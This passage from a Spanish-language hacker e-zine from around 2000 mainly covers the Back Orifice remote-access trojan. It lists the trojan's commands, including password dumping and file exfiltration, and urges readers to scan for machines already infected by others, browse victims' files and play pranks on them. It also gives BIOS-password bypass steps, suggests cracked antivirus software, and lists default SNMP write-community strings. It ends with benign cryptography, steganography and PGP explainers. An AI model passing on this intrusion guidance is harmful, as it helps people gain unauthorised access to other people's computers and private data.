pluginlist Da un listado de los plugin activos.
prockill Finaliza un proceso.
proclist Listado de los procesos en curso.
procspawn Ejecuta un programa.
rediradd Redirecciona los paquetes ip entrantes a otra ip
redirdel Para el redireccionamiento.
redirlist Listado de puertos de rediccionamiento activos
regmakekey Crea una entrada en el registro
regdelkey Borra una entrada en el registro.
regdelval Borra un valor del registro.
reglistkeys Listado sub llaves de una llave del registro
reglistvals Listado de los valores de una llave del registro
regsetval establece el valor de una llave del registro
resolve resuelve la direccion ip del server
dialog Crea un cuadro de dialogo con el texto que quieras y el boton ok
info Da la informacion completa del server
lockup cierra el server
passes Muestra las contrasenas del usuario actual y la del
salvapantallas. Pueden contener basura al final.
reboot Apaga el server y lo reinicia. XDDD
tcprecv Conecta el server a una ip concreta y guarda la data recibida de
esa conexion al archivo especificado.
tcpsend conecta el server a una ip, manda el contenido del archivo
especificado y cierra la conexion
<<<<<¨Me puedo aprovechar del trabajo de otros?>>>>>
Por supuesto. Otros ya han hecho la parte mas dura por ti (colar el
troyano).
Puedes probar "a ciegas" desde bo cada ip, con el comando host "ip". Si
te funciona el comando dir, ¡¡¡esta infectado!!! O sea, que estas dentro.
Aun mejor realiza un barrido de Ips con el Bogui.exe(ambiente grafico).
Parece ser segun http://www.ntbugtraq.com/ que existen por ahi varios
detectores de B.O. (entre ellos el BoSniffer.zip) que son en realidad
troyanos (con el BOServer + el pluggin SpeakEasy). Este troyano intenta
un login en el canal #BO_OWNED de un servidor IRC con un nick aleatorio
informando ademAs de la IP del "afortunado galardonado" con el troyano.
<<<<<¨Puedo formatearle el Disco Duro?>>>>>
Espero que no abuses de los conocimientos obtenidos. No hagas putadas.
Roba fotos porno, crea un dir "Pervertido" o "Mehemetidoentuvida".
Intenta acceder al cdrom. Ejecutale un archivo de sonido.
Que flipe, pero no abuses.
Si hace un Netstat vera tu ip. Y has de saber que con la IP, y la hora en
que ocurria todo, el ISP y Jodetel, de la mano como hermanos, os pueden
recomendar un bello hotelito... lo de siempre, precaucion.
Protecciones caseras contra BO
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Algunas versiones de BO estan modificadas para no ser detectadas por
Norton y otros.
1) Una manera casera de detectar BO es buscar en c:\windows\system, si ves un
espacio entre los iconos, esto siginifica que el Bo esta
invisible, si el archivo contiene 22 kb, estas infectado!!!.
Ademas debes buscar anomalias como windll.dll, la libreria que BO usa por
defecto para cargarse en el sistema.
2)Desde msdos digita netstat -an, este te dira los puertos que estan
escuchando en ese momento en tu makina. Por defecto BO usa el 31377.
3) Otra manera es buscar la cadena "bofilemapping". Otra es hacer
"command /k /netstat -n" y ver si hay algun puerto funcionando en 3000
y pico. Por defecto BO usa el 31377.
4) Una vez detectado lo borras, komo es de saber desde Guindouz no lo puedes
realizar, ya que cuando una aplicacion esta corriendo no la puedes eliminar
¨Cierto o No? Hackers, Wannabes y demases :)
<<<<<¨Entonces, que hago?>>>>>
Facil!, reinicias la makina presionas F8 y eliges Modo Ms-dos.
Una vez en el dos digitas cd windows\system.
Luego digitas el comando del exe~1 y listo!!
Cabe mencionar que no siempre tendra este nombre, recuerda que el
Bo se puede configurar a tu antojo.
4) Otra manera es yendo al registro.
<<<<<¨Como llego al registro?>>>>>
Hay varias maneras, creo que esta es la mas facil.
a) Un click en Inicio.
b) Eliges Ejecutar.
c) Digitas "regedit" (sin las comillas).
d) Y finalmente <enter>.
HEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
y buscar anomalias como windll.dll, la libreria que BO usa por defecto
para cargarse en el sistema.
Por supuesto puede tener otro nombre y estar acompanada de comentarios
falsos "Key file for Windows System Tray, do not delete", etc.
BO no puede acceder a directorios cuyo nombre contenga un alt+255, este
puede ser un buen lugar para instalar el antivirus.
PROTECCIONES GRATUITAS CONTRA BO:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) El nobo, cuya funcion es logear al atakante y darte la ip del mismo.
Ademas con el nobo puedes saber si estas o no infectado con el troyano,
ya que cuando lo ejecutas en tu makina te dara el siguiente error:
"A network has ocurred error: Address already in use. May Back Orifice
is already listening on the port I tried to bind? (10048-49)".
http://web.cip.com.br/nobo/
2) Liberator (lo mismo que el primero).
http://liberator.com/
3) Mcafee 4.02(recomendado) y Symantec Norton Antivirus tambien son efectivos
contra BO.
http://mcafee.com/
http:/symantec.com/
<<<<<¨Pero no son gratis?>>>>>
No jodas, para eso estan los craks ¨O no? >:]
<<<<Accesorios(plugins) para BO>>>>
* "SpeakEasy" Abre un canal IRC BO_OWNED donde se muestra informacion
sobre la IP de la victima
* "SaranWrap" Pega BO a cualquier otro programa.
* "SilkRope" Idem SaranWrap pero con encriptacion de 8 bits.
* "ButtTrumpet" Manda eamail a una direccion predeterminada con la
IP de la victima.
* Programas que desactivan las protecciones contra BO (solo he oido
hablar de ellos, pero si hay virus que lo hacen con AVP probablemente
ya esten por ahi versiones para BO).
Y muchas otras ideas que circulan medio en secreto..
REFERENCIAS
www.cultdeadcow.com
www.cultdeadcow.com\tools\bo\plugins.html
www.vanhackez.com
www.netninja.com\bo\index.html
www.zdnet.com\pcweek\news\0817\20mbosec.html
Apendice - ¨Como puedo escribir mi propio plugin para Back Orifice?
(Traduccion del original que acompa¤a al programa)
Para escribir tu propio plugin para el Back Orifice, solo tienes que
crear una DLL con funciones del tipo:
char *YourFunc(int *active, char *args)
El comando de ejecucian del plugin te permite especificar una dll y un
nombre de funcion del tipo: "dll:_Function". El resto de los parametros
son pasados a tu funcion en los args de los parametros. La unica cosa
de la que se ocupa tu aplicacion es de monitorizar la int al que apunta
el activo. Si ese valor se vuelve 0, el usuario ha pedido que el plugin
termine y tu funcion deberia restablecerse en lo mas rapidamente posible
en cuanto se cierre todo lo que haga falta ser cerrado.
Tu programa puede devolver NULL, o puede devolver a un pointer que
apunte a un bufffer estatico que contenga un mensaje de texto que sera
ofrecido al usuario.
La DLL no se cargara hasta que el texto se copie desde ese buffer.
Y eso es todo lo que hay.
Bien hasta aqui este articulo, espero que les haya gustado, si tienen
alguna duda o comentario; ya saben donde escribir.
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~
Jugando con el Bios II
~^~^~^~^~^~^~^~^~^~^~^~
~^~^~^~^~^~^~^~^~^~^~^~
Ya hemos visto en la primera entrega de esta revista, varias maneras de como
romper el password de la bios.
Pues nada aqui agrego otra, de las tantas que existen.
1)Entras a modo MS-DOS.
2) Digitas el codigo que esta entre los puntos.
..............
Debug <enter>
¢ 6017 <enter>
¢ 21FE <enter>
q <enter>
..............
Algo muy importante y que no podia faltar es la aclaracion que me envio
Kralj Killer con respecto a la primera parte de este artikulo.
Pues bien aqui reproduzco tal cual sus palabras :)
Observando el e-zine vi el articulo de "Jugando con el
Bios", el cual me parecio muy interesante, pero vi un
pequeno error el cual se lo voy a hacer notificar.
Usted en la introducion del articulo dice :
"Normalmente el BIOS es escrito en lenguaje de
maquina (ASSEMBLER), o sea, comandos a nivel muy elemental
que permiten un control total de las posiciones de memoria
y de los perifericos".
Pues le cuento amigo que existen tre tipos de
programacion que son:
-Lenguaje Maquina.
-Lenguaje Bajo Nivel.
-Lenguaje Alto Nivel.
El Lenguje de Maquina NO ES Assembler, pues es lenguje
de maquina es el Codigo Binario, que es 0 y 1.
Assembler es conocido como un Lenguaje de Bajo nivel
NO de maquina...
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Criptografia y sus ramas
~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Empezamos este material con su concepto y una de sus ramas :)
Criptografia :
~~~~~~~~~~~~
Ciencia que estudia y disena el conjunto de tecnicas y algoritmos empleados para
cifrar informacian. Es una herramienta basica en Internet para proteger la
privacidad, garantizar el anonimato y permitir transacciones seguras en el comercio
electranico. El que el uso de criptografía permita comunicaciones secretas, que no
pueden ser intervenidas, ha llevado a muchos gobiernos a considerar que puede ser
utilizada por terroristas y delincuentes para comunicarse de forma segura. Por ello,
han tratado de restringir su uso, importacian y exportacian, escudandose muchas veces
en que puede tener usos militares, y por tanto ha de ser considerada como un arma.
Estos controles, ademas de ser con frecuencia inútiles, ponen en peligro la proteccian
de la privacidad en Internet.
Esteganografia:
~~~~~~~~~~~~~~
Es la ciencia de esconder mensajes dentro de mensajes.
En la antiguedad, Esto podria suponer el tatuar un mensaje secreto en la cabeza
rapada de un mensajero, y dejar que le creciera el pelo antes de enviarle a
atravesar territorio enemigo. En el mundo de los ordenadores, ese termino ha
venido a significar el esconder mensajes secretos en graficos, imagenes, peliculas
o sonidos. El emisor esconde el mensaje en los bits menos significativos de uno
de estos tipos de ficheros (la calidad se degrada levemente, pero, si se hace bien,
apenas se notara y el receptor lo extrae al recibirlo).
Varios programas comerciales y gratuitos permiten hacer esteganografia, ya
sea por si mismos o formando parte de un paquete completo de seguridad en las
comunicaciones. Su justificacion es la siguiente: si Alice quiere enviar a Bob
un correo electronico de forma segura, puede utilizar alguno de los muchos
programas de encriptacion de e-mail. A pesar de ello, un fisgon podria interceptar
el mensaje y, aun siendo incapaz de leerlo, sabria que Alice esta enviando a
Bob un mensaje secreto. La esteganografia permite a Alice comunicarse con Bob
de forma secreta.
Ella puede coger su mensaje y esconderlo en un fichero tipo GIF con la imagen
de dos jirafas. Cuando el fisgon intercepte el mensaje, todo lo que vera sera
una fotografia de dos jirafas; no tendra ni idea de que Alice esta enviando a
Bob un mensaje secreto. Incluso ella podria encriptar el mensaje antes de
esconderlo, como proteccion adicional.
Hasta aqui, muy bien. Pero no es asi como funciona realmente en la practica.
El fisgon no es estupido. Tan pronto como vea la fotografia de las jirafas,
comenzara a sospechar. ¨Porque enviara Alice a Bob una fotografia de dos jirafas?.
¨Acaso Bob colecciona jirafas?. ¨Es un artista grafico?. ¨Han estado Alice y Bob
enviandose el uno al otro esa misma imagen de las jirafas durante semanas?.
¨Acaso mencionan siquiera esa fotografia?.
El objeto de la esteganografia es esconder la existencia de un mensaje, ocultar
el hecho de que las partes se estan enviando algo distinto a unas inocuas foto-
grafias.
Esto solo funciona cuando se utilizan los patrones de comunicacion usuales. Yo
nunca he enviado ni recibido un fichero GIF en toda mi vida. Si repentinamente
alguien me envia uno, no necesitare buscar a un cientifico especializado para
que me diga que hay un mensaje esteganografico escondido en alguna de sus partes.
Si Alice y Bob ya intercambiaban, de forma regular, ficheros adecuados para ocultar
mensajes estaganograficos, el fisgon no podra saber que envios contienen los
mensajes, si es que los hay. Si Alice y Bob cambian sus patrones de comunicacion
para esconder mensajes, no funcionara. Un fisgon sospechara.
Esto es importante. He visto como se recomendaba la utilizacion de la esteganografia
para comunicaciones secretas en regimenes opresivos, donde el simple hecho de
enviar un correo electronico encriptado podria ser considerado como subversivo.
Este es un mal consejo. En caso de amenaza, se supone que usted esta bajo sospecha
y quiere parecer inocente ante cualquier investigacion. Esto es dificil. Usted
utilizara un programa de esteganografia que estara disponible para el fisgon.
El tendra una copia.
Estara alerta ante posibles mensajes esteganograficos. No utilice la imagen de
ejemplo que vino con el programa cuando lo bajo de la red; el fisgon lo
reconoceria enseguida. No utilice la misma imagen una y otra vez; el fisgon
buscara las diferencias entre los envios que revelen la existencia de un mensaje
secreto. No utilice una imagen que haya descargado de la red; el fisgon puede
facilmente comparar la imagen que usted esta enviando con la imagen de referencia
(usted debe suponer que El monitorizo su descarga o que ha buscado y encontrado
en la red esa misma imagen). Tambien deberia tener una buena excusa para
explicar porque esta usted enviando imagenes una y otra vez. Y esa excusa
deberia existir antes de que comenzase a enviar mensajes esteganograficos, y
tambien despues. De otra forma usted no habra ganado realmente nada.
La esteganografia tambien puede utilizarse para ocultar ficheros en su disco
duro. Esto tambien es algo problematico. Supongamos que la policia secreta le
arresta a usted y comienza a buscar en su disco duro. Usted tiene un monton de
fotos pornograficas en el, por lo que tiene una excusa "decente". Pero ademas
tiene usted el programa esteganografico en el disco duro, por tanto la policia
secreta sospechara. Ellos podrian tratar de descargar las mismas fotografias de
la red y buscar las diferencias que revelasen la existencia de un mensaje oculto.
O pueden simplemente suponer que usted tiene mensajes ocultos en alguna parte.
Existen ciertas ventajas sobre la encriptacion directa (al menos en los paises
libres usted podria argumentar que la policia no tiene evidencias reales),
pero deberia pensarselo cuidadosamente.
Nota:
Sacado de Kriptopolis
°°°°°°°°°°°°°°°°°°°°°
Si te interesa saber mas sobre la criptografia, en la seccion de TERMINOS
HACKERS II, encontraras mas conceptos relacionados con el tema ;)
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Guia del PGP 5.3.5
~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
FAQ basica sobre el programa de encriptacion PGP 5.5.3.
Esta FAQ incluye nociones basicas, instalacion y utilizacion.
- ¨Que es PGP?
- ¨Que utilidad tiene PGP?
- ¨Es fiable PGP?
- ¨Cuanto cuesta el programa?
- ¨Donde se puede conseguir?
- ¨Como funciona?
- ¨Que peligro existe de que alguien intercepte mi clave publica?
- ¨Que ocurre si alguien intercepta el mensaje PGP que me envía
otra persona?
- ¨Que ocurre si alguien intercepta el mensaje PGP que yo envío
a otra persona?
- ¨Que necesito para mandar un mensaje cifrado a otra persona?
- ¨Como se instala el programa?
- ¨Una vez instalado, que?
- ¨Con que programas de correo electronico se puede utilizar?
- ¨Como enviar un mensaje encriptado?
- ¨Como desencriptar un mensaje que me han enviado?
- ¨Que otros archivos se pueden codificar aparte de archivos de texto?
- ¨Puedo mandar un archivo codificado como adjunto en un mensaje de e-mail?
- ¨Como?
- ¨Como desencriptar un archivo adjunto que nos llegue por e-mail?
- ¨Que son las firmas digitales?
¨QUE ES PGP?
PGP (Pretty Good Privacy) es un programa que encripta la informacion
digital (textos o cualquier otro tipo de archivo) y luego permite
desencriptarla. Por ejemplo, un texto que diga "Hola, soy yo" quedaría
convertido en algo parecido a "DXCfg%/yfggER$%"
¨QUE UTILIDAD TIENE PGP?
La principal es esconder informacion a ojos de otras personas que
quieran tener acceso a ella. Su uso mas comun es con el correo
electronico. Cuando se envía un mensaje de correo electronico, ese
mensaje pasa por muchos ordenadores antes de llegar a su destinatario.
Cualquier persona con acceso a esos ordenadores y con malas intenciones
podría tener acceso a los mensajes. Usando PGP los mensajes no viajan
tal como se escribieron, sino que van codificados, decodificandose
unicamente en su destino.
¨ES FIABLE PGP?
Actualmente es el sistema de encriptacion mas utilizado. Miles de
usuarios lo usan día a día para sus comunicaciones. Con respecto a su
seguridad aun no hay noticias fiables de que se haya conseguido romper
una clave PGP. De hecho, se han realizado experimentos por parte de
conocidos criptografos para intentarlo con resultados negativos. De
todas formas, cualquiera que lo consiga obtendra una fama bastante
sonada y la noticia correra como la polvora entre los miles de usuarios
que continuamente estan al día de todo lo relacionado con PGP y la
criptografía.
¨CUANTO CUESTA EL PROGRAMA?
PGP es gratuito, para usos no comerciales.
¨DONDE SE PUEDE CONSEGUIR?
Hay montones de sitios en Internet para descargar PGP. En espanol
existe una de las mejores paginas sobre criptografía desde donde se
enlaza con las paginas internacionales de descarga, aparte de contener
gran cantidad de informacion.
http://www.kriptopolis.com
¨COMO FUNCIONA PGP?
PGP funciona a traves de claves. Cada usuario tiene una clave propia y
unica que genera el propio programa. Esta clave esta partida en dos,
una publica y otra privada. La clave publica, como su propio nombre
indica, se puede hacer publica y hay que entregarla A AQUELLOS QUE NOS
VAYAN A ENVIAR MENSAJES CIFRADOS. La clave privada hay que mantenerla
en secreto y conviene sacarle copias de seguridad.
Cuando alguien nos vaya a enviar un mensaje cifrado con PGP tendra que
encriptarlo CON NUESTRA CLAVE PÚBLICA que le habremos proporcionado
previamente por correo electronico o de otra forma.
¨QUE PELIGRO EXISTE DE QUE ALGUIEN INTERCEPTE MI CLAVE PUBLICA?
Ninguno, ya que la clave publica no es nada sin la privada a efectos de
desencriptar los mensajes.
¨QUE OCURRE SI ALGUIEN INTERCEPTA EL MENSAJE PGP QUE ME ENVIA OTRA
PERSONA?
Nada. Lo unico que obtendra es un conjunto de caracteres extranos sin
pies ni cabeza que no podra desencriptar, ya que no posee la clave
privada que es la pieza necesaria para poder convertir el mensaje a su
forma original. Solo cuando el mensaje llegue a su destino final podra
ser desencriptado.
¨QUE OCURRE SI ALGUIEN INTERCEPTA EL MENSAJE PGP QUE YO ENVIO OTRA
PERSONA?
Absolutamente lo mismo.
¨QUE NECESITO PARA MANDAR UN MENSAJE CIFRADO A OTRA PERSONA?
El programa PGP y la clave publica de esa persona.
¨COMO SE INSTALA?
Una vez el archivo de instalacion en nuestra maquina hay que
ejecutarlo. Siguiendo las instrucciones que aparecen en pantalla, el
programa genera nuestras claves publica y privada durante el proceso de
instalacion.
Cuando se generan las claves, PGP nos pide un password, de al menos 8
caracteres, para poder utilizarlas. Es conveniente recordar este
password para poder luego desencriptar informacion.
¨UNA VEZ INSTALADO, QUE?
Estaremos dispuestos para utilizar PGP. Lo primero es crear una copia
de nuestras claves publica y privada. Estas claves estan ubicadas en la
carpeta del programa, que por defecto es:
c:\Program Files\PGP\PGP55i
Clave publica: pubring.pkr
Clave privada: secring.skr
De todas formas, al cerrar el programa PGP se nos invita a crear una
copia de seguridad de las claves.
Seguidamente exportaremos nuestra clave publica para poder entregarla
adecuadamente a aquellos que nos vayan a enviar mensajes codificados.
Para ello hay que abrir el programa PGP Keys, que esta en
INICIO/PROGRAMS/PGP/PGP Keys. Este programa es el que contiene las
claves de las personas a las que enviamos normalmente correo cifrado,
lo que ocurre es que PGP incluye una serie de claves de ejemplo de unos
senores que no conocemos de nada y que se pueden borrar. Dentro de esa
relacion aparecera la nuestra. Se selecciona nuestra clave y se pulsa
en KEYS/EXPORT, en ese momento aparece un cuadro de dialogo pidiendonos
donde guardar la clave. Ese archivo es el que deberemos enviar como
nuestra clave publica.
¨CON QUE PROGRAMAS DE CORREO ELECTRONICO SE PUEDE UTILIZAR?
PGP incorpora plug-ins para ser utilizado con Eudora, Exchange y
Outlook, pero utilizando la opcion "encriptar portapapeles" se puede
utilizar con cualquier programa de correo.
¨COMO ENVIAR UN MENSAJE ENCRIPTADO?
Lo primero que hay que hacer es obtener la clave publica de la persona
a quien vamos a enviar el mensaje. Para ello se la podemos pedir
directamente por e-mail o la podemos extraer de su
pagina WEB si la tiene allí publicada. Una vez con su archivo de clave
publica en nuestro ordenador hay que importarlo a PGP Keys. Para ello:
- Colocaremos el archivo en una carpeta (por ejemplo la del PGP),
- Abrimos PGP Keys (INICIO/PROGRAMS/PGP/PGP Keys)
- Pulsamos KEYS/IMPORT
- En la ventana de dialogo se selecciona el tipo de archivo de la
clave (.txt/asc/pkr/skr...) y se importa.
Este proceso no tendremos que repetirlo mas veces y su clave publica
quedara incorporada a nuestra relacion de claves.
Estamos listos para enviar correo encriptado. Vamos a utilizar un
programa que no este soportado por PGP y lo haremos a traves del
portapapeles, que es la forma mas estandar y compatible de hacerlo y
vale para todos los programas.
- Lo primero es abrir el programa de correo (supongamos que es Netscape
Messenger). Compondremos el mensaje normalmente, poniendo la
direccion electronica y el asunto en su sitio y el texto en el
cuerpo del mensaje.
- Una vez el texto acabado se selecciona y con las teclas CONTROL+X se
corta al portapapeles.
- Seguidamente pulsaremos en el icono que esta junto al reloj de
Windows, en la barra de tareas (un icono con un sobre blanco en el
centro). Si no tenemos ese icono, lo podemos activar pulsando en
INICIO/PROGRAMS/PGP/PGPtray.
- Del menu emergente habremos de pulsar en "Encrypt Clipboard".
- En ese momento se nos pregunta con que clave habremos de encriptar el
texto. Selecionaremos la clave de la persona a la que vamos a enviar
el mensaje haciendo doble click sobre ella. Seguidamente se pulsa en
OK. En ese momento el contenido del portapapeles queda encriptado.
- Pulsamos de nuevo en el cuerpo del mensaje, que estara en blanco, y
con las teclas CONTROL+V pegaremos el contenido del portapapeles al
cuerpo del mensaje. Observaremos que el mensaje ahora es una serie
de caracteres sin ningun sentido.
- Procederemos entonces a enviar el mensaje normalmente via e-mail.
¨COMO DESENCRIPTAR UN MENSAJE QUE ME HAN ENVIADO?
Una vez abrimos el correo y vemos que tiene un mensaje encriptado
procedemos a copiarlo íntegro al portapapeles:
-----BEGIN PGP MESSAGE-----
Version: PGPfreeware 5.5.3i for non-commercial use
<http://www.pgpi.com>
qANQR1DBwU4DhZrHKiEmOtwQCACKcH+Cw1r2zcCaN6PAH5sK1ZjX5J4C1GjU8Q9G
ajMEhvbHEB9tpbjfBD3UO5oZ8QFBvCaWIgZtg9cF317OfA5UaIhArInzPMRxgmPD
cHpciZS+83EMkZGcMjFAZfqMgCQgb0+Is1Ng6rCtRqdRAZlpmr7ABCIe1QeEG+6P
P79vzE3yf0JihVjSWz6dfAQ9nmyHDkRSA9p8VCdBKOXK9xPZMufjnHTSBRdxHCHz
Y55iZVrwEy4uRDHto3vHLet0fDWDDfqQ2CFL3xLW+EB9N2UVmquOhBjcSQu/pouA
NR308f+ra0xGa0xLpXY4gaibx9TEQittfP1qgbHGQJOgZF+tCADzVFI8N4S6p04E
rIC/dmNaxBES8jnWyAcuqlmjV1vZdg0Nhv7ZeraPewG4Dsdzj0kqnBBhxYGOzboX
xTgicgZZIq30O23w910zvjyNuYXolUY/mwQIbrEzFDF42+M+CSd9C4dnb+GHmYU8
sbhazvlFfhSAweWSbpDsd0sNHz8VFQnzj8exWN7UDF0tUPhkl2ceL7aLRDaPW4Ea
jRcoMORlZpoUYQcpHhtRskFDL3qT+SsTpy3K72BRGX32CD8DtSEeah1hbJaj2HMj
EyRGmYIM1HrmFc+ZXQDBJy84X0VwnPazIlLjaJnpHd9OExvGIcer5LHE66Gu2WTP
UAnMw08QySNLgg6n2Uph+lKroCFvuG/W2toIWbGG+1TtbCxaA10IO7o7SQ==
=xtLd
-----END PGP MESSAGE-----
Incluyendo las líneas:
-----BEGIN PGP MESSAGE-----
.
.
.
-----END PGP MESSAGE-----
Seguidamente pulsamos en el icono PGPtray y seleccionamos la opcion
"Decrypt/Verify Clipboard". En ese momento se nos solicita el password
para poder utilizar nuestra clave. Al introducirlo veremos en pantalla
el texto original.
¨QUE OTROS ARCHIVOS SE PUEDEN CODIFICAR APARTE DE ARCHIVOS DE TEXTO?
Cualquier tipo de archivos.
¨PUEDO MANDAR UN ARCHIVO CODIFICADO COMO ADJUNTO EN UN MENSAJE DE E-MAIL?
Se puede y se recomienda si es informacion importante.
¨COMO?
Lo primero es codificar el archivo y despues enviarlo normalmente como
adjunto en un e-mail. Para ello PGP ha incluido su funcion de
codificacion en el menu emergente al utilizar el boton derecho del
raton.
- Localizar el archivo en la carpeta donde se encuentre.
- Pulsar sobre el con el boton derecho del raton.
- Seleccionar "PGP"
- Seleccionar "Encrypt"
- Seleccionar la clave de la persona a la que se lo vamos a enviar
haciendo doble click sobre ella.
- Pulsar OK
- En ese momento se creara un archivo nuevo ya encriptado con la
extension PGP. Por ejemplo, si el archivo original se llamaba
informe.xls, el nuevo archivo resultante quedara como
informe.xls.pgp. Ese es el archivo que deberemos enviar como
adjunto.
¨COMO DESENCRIPTAR UN ARCHIVO QUE NOS LLEGUE POR E-MAIL?
Una vez el archivo en el disco duro hay que hacer doble click sobre el
y aparecera el cuadro de dialogo para introducir nuestro password para
usar la clave privada. Al hacerlo el archivo quedara desencriptado.
¨QUE SON LAS FIRMAS DIGITALES?
Otra funcion de PGP que permite autentificar los documetos para
garantizar que realmente proceden de la persona que lo envía y no un
falsificador que pueda haberlos modificado. La firma digital se activa
igual que la encriptacion pero usando la opcion "Sign". Incluso se
pueden usar simultaneamente son "Encrypt & Sign".
--EOF--
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Bugs Dimension
~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~^
Acabas de entrar a la dimension de los bugs, erratas o como se le llame ;)
Enjoy chikos!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&
Resumen de Bugtraq del 13-02-2000 al 21-02-2000
~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&~&
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerabilidades en el Servidor Web Personal de Microsoft FrontPage,
en servidores de nombres, en NetBSD, en Ultimate Bulletin Board, e
incluso en el nuevo Microsoft Windows 2000.
1. Vulnerabilidad de recursividad inversa de directorios en
Microsoft FrontPage PWS
2. Vulnerabilidad de amplificacian de trafico y NS Route
Discovery en servidores de nombres
3. Vulnerabilidad de SNMP Community con acceso de escritura de
múltiples vendedores
4. Vulnerabilidad en NetBSD procfs
5. Vulnerabilidad de symlink en /tmp en SCO Unixware ARCserver
6. Vulnerabilidad de falta de proteccian del compartido ADMIN$
durante la instalacian de Microsoft Windows 2000
7. Vulnerabilidad de ejecucian de comandos arbitrarios en
Ultimate Bulletin Board
8. Vulnerabilidad en autorun.inf de Microsoft Windows
1. Vulnerabilidad de recursividad inversa de directorios en
Microsoft FrontPage PWS
BugTraq ID: 989
Remoto: Sí
Fecha de publicacian: 16-02-2000
URL relevante: http://www.securityfocus.com/bid/989
Resumen:
El Front Page Personal Web Server de Microsoft seguira las
cadenas '/..../' en las URLs pedidas, lo que permite a usuarios
remotos obtener acceso no autenticado de lectura a archivos y
directorios en la misma unidad lagica donde se encuentra el
contenido de la pagina web. Este metodo tambien permite ver los
archivos ocultos, aunque no así el directorio mismo de Front
Page. El nombre y ruta del archivo deseado debe ser conocido por
el atacante.
2. Vulnerabilidad de amplificacian de trafico y NS Route
Discovery en servidores de nombres
BugTraq ID: 983
Remoto: Sí
Fecha de publicacian: 14-02-2000
URL relevante: http://www.securityfocus.com/bid/983
Resumen:
Existe un potencial ataque de denegacian de servicio (de aquí en
adelante DoS) en la configuracian por defecto de muchos
servidores DNS populares. Si un servidor permite que hosts
remotos le pregunten por maquina que no son servidas por el mismo
causara un problema de recursividad, con lo que seria posible
causar una amplificacian de trafico. Mientras que el numero de
paquetes amplificados por un solo servidor no basta normalmente
para causar una negacian de servicio, al explotar la naturaleza
jerarquica del DNS se hace posible causar que gran cantidad de
trafico se dirija a un solo sitio.
La vulnerabilidad existe en la manera en que los servidores de
nombres se comportan cuando no pueden recibir respuestas por un
dominio de un servidor de nombres que ellos consideran
autoritario. Cuando un servidor recibe una consulta, típicamente
este es redireccionado hacia arriba en la cadena de servidores de
DNS. Si la consulta no puede ser resuelta porque no existe un
servidor a la escucha en el host remoto, cada reenvío tratara de
resolver el servidor de nombres. Esto se intenta típicamente 3
veces, a los 0, 12 y 24 segundos. En este caso, el trafico se ve
significativamente multiplicado. Al abusar de múltiples
servidores de nombres es posible enviar gran cantidad de datos a
una red dada, con paquetes de hasta 500 bytes.
3. Vulnerabilidad de SNMP Community con acceso de escritura de
múltiples vendedores
BugTraq ID: 986
Remoto: Sí
Fecha de publicacian: 15-02-2000
URL relevante: http://www.securityfocus.com/bid/986
Resumen:
En varios sistemas operativos y dispositivos de red existen
comunidades por defecto con acceso de escritura para todos. Al
ser posible su escritura por parte de todos, permiten a usuarios
remotos configurar propiedades del sistema operativo o dispositivo
sin ninguna autorizacian mas que el conocimiento del nombre de
comunidad.
Algunas de las comunidades/vendedores por defectos son:
public (ascend,cisco,bay networks (nortel),microsoft,sun,3com, aix)
private (cisco,bay networks (nortel),microsoft,3com, brocade, aix)
write (ascend, muy comun)
"all private" (sun)
monitor (3com)
manager (3com)
security (3com)
OrigEquipMfr (brocade)
"Secret C0de" (brocade)
admin
default
password
tivoli
openview
community
snmp
snmpd
system (aix, otros)
el nombre del router (ej. 'gate')
Los ataques pueden resultar en actos como la manipulacian de las
tablas de rutado, corrupcian de la cache de arp, que luego pueden
llevar a mas compromisos. Este tipo de vulnerabilidad es conocida
desde hace ya tiempo y en la seccian de creditos de la url
relevante se encuentra disponible mas informacian al respecto.
Pueden existir mas productos con comunidades que por defecto
permitan el acceso de lectura/escritura. Si tiene mas informacian
sobre productos que puedan ser vulnerables (informacian mas
especifica sobre versiones de firmware o correcciones) envíe un email
a <vuldb@securityfocus.com> y a <buzon@hsiapsec.com>.
4. Vulnerabilidad en NetBSD procfs
BugTraq ID: 987
Remoto: No
Fecha de publicacian: 16-02-2000
